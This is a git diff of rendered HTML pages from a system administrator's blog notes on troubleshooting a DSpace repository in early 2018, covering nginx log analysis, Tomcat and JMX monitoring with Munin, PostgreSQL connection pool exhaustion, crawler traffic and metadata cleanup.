<pre tabindex="0"><code>2018-01-29 05:30:22,226 INFO org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1994+TO+1999]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
Was expecting one of:
&quot;TO&quot; ...
&#34;TO&#34; ...
&lt;RANGE_QUOTED&gt; ...
&lt;RANGE_GOOP&gt; ...
</code></pre><ul>
@ -1284,12 +1284,12 @@ Was expecting one of:
<li>I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early</li>
<li>Perhaps this from the nginx error log is relevant?</li>
</ul>
<pre><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &quot;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&quot;, upstream: &quot;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&quot;, host: &quot;cgspace.cgiar.org&quot;
<pre tabindex="0"><code>2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: &#34;GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1&#34;, upstream: &#34;http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12&#34;, host: &#34;cgspace.cgiar.org&#34;
</code></pre><ul>
<li>I think that must be unrelated, probably the client closed the request to nginx because DSpace (Tomcat) was taking too long</li>
<li>An interesting <a href="https://gist.github.com/magnetikonline/11312172">snippet to get the maximum and average nginx responses</a>:</li>
</ul>
<pre><code># awk '($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&quot;Maximum: %d\nAverage: %d\n&quot;,max,i?sum/i:0); }' /var/log/nginx/access.log
<pre tabindex="0"><code># awk &#39;($9 ~ /200/) { i++;sum+=$10;max=$10&gt;max?$10:max; } END { printf(&#34;Maximum: %d\nAverage: %d\n&#34;,max,i?sum/i:0); }&#39; /var/log/nginx/access.log
Maximum: 2771268
Average: 210483
</code></pre><ul>
@ -1297,7 +1297,7 @@ Average: 210483
<li>My best guess is that the Solr search error is related somehow but I can&rsquo;t figure it out</li>
<li>We definitely have enough database connections, as I haven&rsquo;t seen a pool error in weeks:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-2*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-2*
dspace.log.2018-01-20:0
dspace.log.2018-01-21:0
dspace.log.2018-01-22:0
@ -1326,16 +1326,16 @@ dspace.log.2018-01-29:0
<li>Wow, so apparently you need to specify which connector to check if you want any of the Munin Tomcat plugins besides &ldquo;tomcat_jvm&rdquo; to work (the connector name can be seen in the Catalina logs)</li>
<li>I modified <em>/etc/munin/plugin-conf.d/tomcat</em> to add the connector (with surrounding quotes!) and now the other plugins work (obviously the credentials are incorrect):</li>
</ul>
<pre><code>[tomcat_*]
<pre tabindex="0"><code>[tomcat_*]
env.host 127.0.0.1
env.port 8081
env.connector &quot;http-bio-127.0.0.1-8443&quot;
env.connector &#34;http-bio-127.0.0.1-8443&#34;
env.user munin
env.password munin
</code></pre><ul>
<li>For example, I can see the threads:</li>
</ul>
<pre><code># munin-run tomcat_threads
<pre tabindex="0"><code># munin-run tomcat_threads
busy.value 0
idle.value 20
max.value 400
@ -1345,18 +1345,18 @@ max.value 400
<li>Although following the logic of <em>/usr/share/munin/plugins/jmx_tomcat_dbpools</em> could be useful for getting the active Tomcat sessions</li>
<li>From debugging the <code>jmx_tomcat_db_pools</code> script from the <code>munin-plugins-java</code> package, I see that this is how you call arbitrary mbeans:</li>
</ul>
<pre><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&quot;jdbc/dspace&quot; maxActive 300
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=DataSource,class=javax.sql.DataSource,name=* maxActive
Catalina:type=DataSource,class=javax.sql.DataSource,name=&#34;jdbc/dspace&#34; maxActive 300
</code></pre><ul>
<li>More notes here: <a href="https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx">https://github.com/munin-monitoring/contrib/tree/master/plugins/jmx</a></li>
<li>Looking at the Munin graphs, I that the load is 200% every morning from 03:00 to almost 08:00</li>
<li>Tomcat&rsquo;s catalina.out log file is full of spam from this thing too, with lines like this</li>
</ul>
<pre><code>[===================&gt; ]38% time remaining: 5 hour(s) 21 minute(s) 47 seconds. timestamp: 2018-01-29 06:25:16
<pre tabindex="0"><code>[===================&gt; ]38% time remaining: 5 hour(s) 21 minute(s) 47 seconds. timestamp: 2018-01-29 06:25:16
</code></pre><ul>
<li>There are millions of these status lines, for example in just this one log file:</li>
</ul>
<pre><code># zgrep -c &quot;time remaining&quot; /var/log/tomcat7/catalina.out.1.gz
<pre tabindex="0"><code># zgrep -c &#34;time remaining&#34; /var/log/tomcat7/catalina.out.1.gz
1084741
</code></pre><ul>
<li>I filed a ticket with Atmire: <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566">https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=566</a></li>
@ -1370,26 +1370,26 @@ Catalina:type=DataSource,class=javax.sql.DataSource,name=&quot;jdbc/dspace&quot;
<li>Now PostgreSQL activity shows 308 connections!</li>
<li>Well this is interesting, there are 400 Tomcat threads busy:</li>
</ul>
<pre><code># munin-run tomcat_threads
<pre tabindex="0"><code># munin-run tomcat_threads
busy.value 400
idle.value 0
max.value 400
</code></pre><ul>
<li>And wow, we finally exhausted the database connections, from dspace.log:</li>
</ul>
<pre><code>2018-01-31 08:05:28,964 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2018-01-31 08:05:28,964 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-451] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:300; busy:300; idle:0; lastwait:5000].
</code></pre><ul>
<li>Now even the nightly Atmire background thing is getting HTTP 500 error:</li>
</ul>
<pre><code>Jan 31, 2018 8:16:05 AM com.sun.jersey.spi.container.ContainerResponse logException
<pre tabindex="0"><code>Jan 31, 2018 8:16:05 AM com.sun.jersey.spi.container.ContainerResponse logException
SEVERE: Mapped exception to response: 500 (Internal Server Error)
javax.ws.rs.WebApplicationException
</code></pre><ul>
<li>For now I will restart Tomcat to clear this shit and bring the site back up</li>
<li>The top IPs from this morning, during 7 and 8AM in XMLUI and REST/OAI:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;31/Jan/2018:(07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
67 66.249.66.70
70 207.46.13.12
71 197.210.168.174
@ -1400,7 +1400,7 @@ javax.ws.rs.WebApplicationException
198 66.249.66.90
219 41.204.190.40
255 2405:204:a208:1e12:132:2a8e:ad28:46c0
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;31/Jan/2018:(07|08)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;31/Jan/2018:(07|08)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 65.55.210.187
2 66.249.66.90
3 157.55.39.79
@ -1426,7 +1426,7 @@ javax.ws.rs.WebApplicationException
<li>I should make separate database pools for the web applications and the API applications like REST and OAI</li>
<li>Ok, so this is interesting: I figured out how to get the MBean path to query Tomcat&rsquo;s activeSessions from JMX (using <code>munin-plugins-java</code>):</li>
</ul>
<pre><code># port=5400 ip=&quot;127.0.0.1&quot; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
<pre tabindex="0"><code># port=5400 ip=&#34;127.0.0.1&#34; /usr/bin/java -cp /usr/share/munin/munin-jmx-plugins.jar org.munin.plugin.jmx.Beans Catalina:type=Manager,context=/,host=localhost activeSessions
Catalina:type=Manager,context=/,host=localhost activeSessions 8
</code></pre><ul>
<li>If you connect to Tomcat in <code>jvisualvm</code> it&rsquo;s pretty obvious when you hover over the elements</li>
@ -1452,15 +1452,15 @@ Catalina:type=Manager,context=/,host=localhost activeSessions 8
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ We don&rsquo;t need to distinguish between internal and external works, so that
Yesterday I figured out how to monitor DSpace sessions using JMX
I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -60,12 +60,12 @@ I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-pl
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -111,7 +111,7 @@ I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-pl
<p class="blog-post-meta">
<time datetime="2018-02-01T16:28:54+02:00">Thu Feb 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -128,7 +128,7 @@ I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu&rsquo;s munin-pl
<li>Run all system updates and reboot DSpace Test</li>
<li>Wow, I packaged up the <code>jmx_dspace_sessions</code> stuff in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> and deployed it on CGSpace and it totally works:</li>
</ul>
<pre><code># munin-run jmx_dspace_sessions
<pre tabindex="0"><code># munin-run jmx_dspace_sessions
v_.value 223
v_jspui.value 1
v_oai.value 0
@ -139,12 +139,12 @@ v_oai.value 0
<li>I finally took a look at the second round of cleanups Peter had sent me for author affiliations in mid January</li>
<li>After trimming whitespace and quickly scanning for encoding errors I applied them on CGSpace:</li>
</ul>
<pre><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./delete-metadata-values.py -i /tmp/2018-02-03-Affiliations-12-deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i /tmp/2018-02-03-Affiliations-1116-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I started a full Discovery reindex:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 96m39.823s
user 14m10.975s
@ -152,12 +152,12 @@ sys 2m29.088s
</code></pre><ul>
<li>Generate a new list of affiliations for Peter to sort through:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 3723
</code></pre><ul>
<li>Oh, and it looks like we processed over 3.1 million requests in January, up from 2.9 million in <a href="/cgspace-notes/2017-12/">December</a>:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2018&#34;
3126109
real 0m23.839s
@ -167,14 +167,14 @@ sys 0m1.905s
<ul>
<li>Toying with correcting authors with trailing spaces via PostgreSQL:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, '\s+$' , '') where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*?\s+$';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=REGEXP_REPLACE(text_value, &#39;\s+$&#39; , &#39;&#39;) where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*?\s+$&#39;;
UPDATE 20
</code></pre><ul>
<li>I tried the <code>TRIM(TRAILING from text_value)</code> function and it said it changed 20 items but the spaces didn&rsquo;t go away</li>
<li>This is on a fresh import of the CGSpace database, but when I tried to apply it on CGSpace there were no changes detected. Weird.</li>
<li>Anyways, Peter wants a new list of authors to clean up, so I exported another CSV:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors-2018-02-05.csv with csv;
COPY 55630
</code></pre><h2 id="2018-02-06">2018-02-06</h2>
<ul>
@ -182,9 +182,9 @@ COPY 55630
<li>I see 308 PostgreSQL connections in <code>pg_stat_activity</code></li>
<li>The usage otherwise seemed low for REST/OAI as well as XMLUI in the last hour:</li>
</ul>
<pre><code># date
<pre tabindex="0"><code># date
Tue Feb 6 09:30:32 UTC 2018
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 223.185.41.40
2 66.249.64.14
2 77.246.52.40
@ -195,7 +195,7 @@ Tue Feb 6 09:30:32 UTC 2018
6 154.68.16.34
7 207.46.13.66
1548 50.116.102.77
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;6/Feb/2018:(08|09)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;6/Feb/2018:(08|09)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
77 213.55.99.121
86 66.249.64.14
101 104.196.152.243
@ -232,8 +232,8 @@ Tue Feb 6 09:30:32 UTC 2018
<li>CGSpace crashed again, this time around <code>Wed Feb 7 11:20:28 UTC 2018</code></li>
<li>I took a few snapshots of the PostgreSQL activity at the time and as the minutes went on and the connections were very high at first but reduced on their own:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' &gt; /tmp/pg_stat_activity.txt
$ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; &gt; /tmp/pg_stat_activity.txt
$ grep -c &#39;PostgreSQL JDBC&#39; /tmp/pg_stat_activity*
/tmp/pg_stat_activity1.txt:300
/tmp/pg_stat_activity2.txt:272
/tmp/pg_stat_activity3.txt:168
@ -242,7 +242,7 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
</code></pre><ul>
<li>Interestingly, all of those 751 connections were idle!</li>
</ul>
<pre><code>$ grep &quot;PostgreSQL JDBC&quot; /tmp/pg_stat_activity* | grep -c idle
<pre tabindex="0"><code>$ grep &#34;PostgreSQL JDBC&#34; /tmp/pg_stat_activity* | grep -c idle
751
</code></pre><ul>
<li>Since I was restarting Tomcat anyways, I decided to deploy the changes to create two different pools for web and API apps</li>
@ -252,21 +252,21 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<ul>
<li>Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:</li>
</ul>
<pre><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1828
</code></pre><ul>
<li>CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)</li>
<li>What&rsquo;s interesting is that the DSpace log says the connections are all busy:</li>
</ul>
<pre><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre><ul>
<li>&hellip; but in PostgreSQL I see them <code>idle</code> or <code>idle in transaction</code>:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -c dspaceWeb
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c idle
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
187
</code></pre><ul>
<li>What the fuck, does DSpace think all connections are busy?</li>
@ -274,13 +274,13 @@ $ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle
<li>I will try <code>testOnReturn='true'</code> too, just to add more validation, because I&rsquo;m fucking grasping at straws</li>
<li>Also, WTF, there was a heap space error randomly in catalina.out:</li>
</ul>
<pre><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-58&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!</li>
<li>Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:</li>
</ul>
<pre><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}&#39; | sort -n | uniq -c | sort -n | tail -n 20
34 ip_addr=46.229.168.67
34 ip_addr=46.229.168.73
37 ip_addr=46.229.168.76
@ -304,27 +304,26 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfM
</code></pre><ul>
<li>These IPs made thousands of sessions today:</li>
</ul>
<pre><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
530
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
859
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
610
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
8
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
826
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
727
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
181
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
24
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
166
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
992
</code></pre><ul>
<li>Let&rsquo;s investigate who these IPs belong to:
<ul>
@ -342,11 +341,11 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>What in the actual fuck, why is our load doing this? It&rsquo;s gotta be something fucked up with the database pool being &ldquo;busy&rdquo; but everything is fucking idle</li>
<li>One that I should probably add in nginx is 54.83.138.123, which is apparently the following user agent:</li>
</ul>
<pre><code>BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
<pre tabindex="0"><code>BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
</code></pre><ul>
<li>This one makes two thousand requests per day or so recently:</li>
</ul>
<pre><code># grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
/var/log/nginx/access.log:1925
/var/log/nginx/access.log.1:2029
</code></pre><ul>
@ -355,13 +354,13 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker</li>
<li>This is how the connections looked when it crashed this afternoon:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
290 dspaceWeb
</code></pre><ul>
<li>This is how it is right now:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
5 dspaceWeb
</code></pre><ul>
@ -378,11 +377,11 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn&rsquo;t show up on the item</li>
<li>Leave all settings but change choices.presentation to lookup and ORCID badge is there and item submission uses LC Name Authority and it breaks with this error:</li>
</ul>
<pre><code>Field dc_contributor_author has choice presentation of type &quot;select&quot;, it may NOT be authority-controlled.
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &#34;select&#34;, it may NOT be authority-controlled.
